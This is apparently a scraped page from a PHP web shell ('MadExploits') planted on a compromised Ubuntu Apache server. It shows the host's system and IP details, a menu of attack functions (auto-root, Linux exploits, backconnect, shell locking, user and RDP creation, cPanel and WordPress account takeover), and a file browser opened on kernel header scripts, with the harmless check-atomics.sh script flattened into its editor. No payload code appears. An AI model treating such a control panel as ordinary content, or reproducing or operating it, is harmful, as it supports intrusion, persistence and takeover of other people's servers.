Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.159.95
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-198 /
scripts /
atomic /
[ HOME SHELL ]
Name
Size
Permission
Action
fallbacks
[ DIR ]
drwxr-xr-x
atomic-tbl.sh
3.33
KB
-rwxr-xr-x
atomics.tbl
1.13
KB
-rwxr-xr-x
check-atomics.sh
728
B
-rwxr-xr-x
gen-atomic-fallback.sh
4.61
KB
-rwxr-xr-x
gen-atomic-instrumented.sh
4.26
KB
-rwxr-xr-x
gen-atomic-long.sh
2.13
KB
-rwxr-xr-x
gen-atomics.sh
599
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check-atomics.sh
#!/bin/sh # SPDX-License-Identifier: GPL-2.0 # # Check if atomic headers are up-to-date ATOMICDIR=$(dirname $0) ATOMICTBL=${ATOMICDIR}/atomics.tbl LINUXDIR=${ATOMICDIR}/../.. echo '' | sha1sum - > /dev/null 2>&1 if [ $? -ne 0 ]; then printf "sha1sum not available, skipping atomic header checks.\n" exit 0 fi cat <<EOF | asm-generic/atomic-instrumented.h asm-generic/atomic-long.h linux/atomic-fallback.h EOF while read header; do OLDSUM="$(tail -n 1 ${LINUXDIR}/include/${header})" OLDSUM="${OLDSUM#// }" NEWSUM="$(sed '$d' ${LINUXDIR}/include/${header} | sha1sum)" NEWSUM="${NEWSUM%% *}" if [ "${OLDSUM}" != "${NEWSUM}" ]; then printf "warning: generated include/${header} has been modified.\n" fi done exit 0
Close